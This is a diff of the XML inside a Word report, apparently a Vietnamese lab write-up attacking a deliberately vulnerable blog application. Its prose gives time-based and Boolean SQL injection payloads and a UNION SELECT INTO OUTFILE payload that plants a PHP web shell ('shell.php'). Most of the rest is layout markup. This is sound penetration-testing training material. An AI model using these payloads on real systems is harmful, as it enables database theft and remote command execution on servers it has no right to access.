     <w:p>
@@ -793,10 +915,10 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="298C60C2" wp14:editId="755FEF56">
-            <wp:extent cx="5943600" cy="3187065"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0996F748" wp14:editId="51E22E9E">
+            <wp:extent cx="5943600" cy="3183255"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="11" name="Picture 11"/>
+            <wp:docPr id="14" name="Picture 14"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -816,7 +938,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3187065"/>
+                      <a:ext cx="5943600" cy="3183255"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -841,7 +963,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Chúng ta sẽ kiểm tra xem chức năng này có lỗ hổng SQL injection không với payload như trên    “ </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Trang web không trả lại bất kì blog nào cũng như thông báo lỗi nào. Chúng ta sẽ thử thêm một vài payload “ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -849,7 +972,7 @@
           <w:szCs w:val="24"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>‘</w:t>
+        <w:t>‘asd</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -871,12 +994,11 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="790959DA" wp14:editId="6D0DC5AF">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65C2A72C" wp14:editId="752DA19E">
             <wp:extent cx="5943600" cy="3190875"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="12" name="Picture 12"/>
+            <wp:docPr id="18" name="Picture 18"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -921,7 +1043,22 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trang web không trả lại bất kì blog nào cũng như thông báo lỗi nào. Chúng ta sẽ thử thêm một vài payload “ </w:t>
+        <w:t>Ứng dụng cũng không trả về bất kì phản hồi nào, nhưng bây giờ ứng dụng lại hiện ra các bài blog như ban đầu. Có thể với payload trên thì ứng dụng đã xảy ra lỗi nhưng nó đã xử lí bằng cách cho ứng dụng quay về trạng thái ban đầu là hiện ra các bài blog.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ta sẽ thử kiểm tra chức năng này với các payload time-based như “ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -929,14 +1066,21 @@
           <w:szCs w:val="24"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>‘asd</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “:</w:t>
+        <w:t>coding’ AND SLEEP(2) #</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -952,10 +1096,10 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1004DDD5" wp14:editId="2C01D464">
-            <wp:extent cx="5943600" cy="3183255"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="497C91E1" wp14:editId="53D61A39">
+            <wp:extent cx="5943600" cy="3187065"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="13" name="Picture 13"/>
+            <wp:docPr id="21" name="Picture 21"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -975,7 +1119,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3183255"/>
+                      <a:ext cx="5943600" cy="3187065"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1000,7 +1144,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Kết quả là ứng dụng trả về một thông báo lỗi:</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Ở góc dưới bên phải của Burp Repeater cho ta biết thời gian phản hồi của server là 2 giây, tức là payload của chúng ta đã thành công.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Ta sẽ viết một đoạn script để khai thác thông tin người dùng. Kết quả là ta khai thác được ứng dụng có 3 người dùng:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1016,10 +1176,10 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13BC49DD" wp14:editId="3866C634">
-            <wp:extent cx="5943600" cy="245110"/>
-            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
-            <wp:docPr id="15" name="Picture 15"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74FD634F" wp14:editId="37D7C8A8">
+            <wp:extent cx="4877481" cy="695422"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="22" name="Picture 22"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1039,7 +1199,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="245110"/>
+                      <a:ext cx="4877481" cy="695422"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1051,237 +1211,6 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Thông báo lỗi cho ta thấy được câu truy vấn của chức năng search, và ở đây có một trường tên là public đang được đặt giá trị TRUE. Ta sẽ thử sử dụng payload Boolean SQL injection để kiểm tra xem có các blog nào đang bị ẩn hay không:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E311A8F" wp14:editId="16596EFB">
-            <wp:extent cx="5943600" cy="3187065"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="16" name="Picture 16"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3187065"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Kết quả là trang web trả về một blog bị ẩn có chứa thông tin của admin:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A19C835" wp14:editId="09234C20">
-            <wp:extent cx="5943600" cy="3187065"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="17" name="Picture 17"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3187065"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Chúng ta cũng có thể thực hiện lỗ hổng Time-based SQL injection với payload:                               </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">“ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>' UNION SELECT null,null,null,SLEEP(5) #</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>“:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D59F236" wp14:editId="6BE6E5C3">
-            <wp:extent cx="5943600" cy="3190875"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="20" name="Picture 20"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3190875"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -2018,6 +1947,23 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="5111170b-7597-4344-97f3-be10cd2c2271" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Tài liệu" ma:contentTypeID="0x01010023A90A6BA4DBF3468E0A82499863AF1B" ma:contentTypeVersion="5" ma:contentTypeDescription="Tạo tài liệu mới." ma:contentTypeScope="" ma:versionID="6d2877a1e5082fcc099ed4019d2dc7ab">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="5111170b-7597-4344-97f3-be10cd2c2271" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="137c91058dcf237b491ec288e750c31c" ns3:_="">
     <xsd:import namespace="5111170b-7597-4344-97f3-be10cd2c2271"/>
@@ -2167,24 +2113,25 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{049197BD-6FA4-4B0F-86A7-62B5EAA8B86C}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="5111170b-7597-4344-97f3-be10cd2c2271"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="5111170b-7597-4344-97f3-be10cd2c2271" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{529F115F-3430-4E66-ADD2-F03D1B0BB476}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CDEE8552-693D-424E-A367-FB9FD52C0B07}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -2200,22 +2147,4 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{529F115F-3430-4E66-ADD2-F03D1B0BB476}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{049197BD-6FA4-4B0F-86A7-62B5EAA8B86C}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="5111170b-7597-4344-97f3-be10cd2c2271"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
 </file>
--- a/REPORT.docx
+++ b/REPORT.docx
@@ -299,6 +299,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -363,6 +364,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -498,6 +500,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -658,6 +661,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -911,6 +915,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -991,6 +996,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1092,6 +1098,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1172,14 +1179,15 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74FD634F" wp14:editId="37D7C8A8">
-            <wp:extent cx="4877481" cy="695422"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C93E4A" wp14:editId="6767869B">
+            <wp:extent cx="4667901" cy="866896"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="22" name="Picture 22"/>
+            <wp:docPr id="5" name="Picture 5"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1199,7 +1207,535 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4877481" cy="695422"/>
+                      <a:ext cx="4667901" cy="866896"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Xâm nhập hệ thống</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Từ đây, ta sẽ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thử tạo một file php tùy ý thông câu lệnh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>SELECT INTO OUTFILE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Dựa vào đường dẫn, ta dự đoán rằng folder của trang web có thể nằm ở </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>/var/www/html/vuln-blog-web/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Ta sẽ thử payload: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>coding’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> UNION SELECT null,null,null,”&lt;?php system($_GET[‘cmd’]); ?&gt;” INTO OUTFILE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>‘/var/www/html/vuln-blog-web/shell.php’ #</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13F34620" wp14:editId="2F32E077">
+            <wp:extent cx="5943600" cy="2832100"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2832100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Ta nhận được status code 500. Ta sẽ kiểm tra thử liệu tập tin shell.php có được tạo ra hay không:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24232B6B" wp14:editId="5195C48F">
+            <wp:extent cx="5943600" cy="2711450"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="8" name="Picture 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
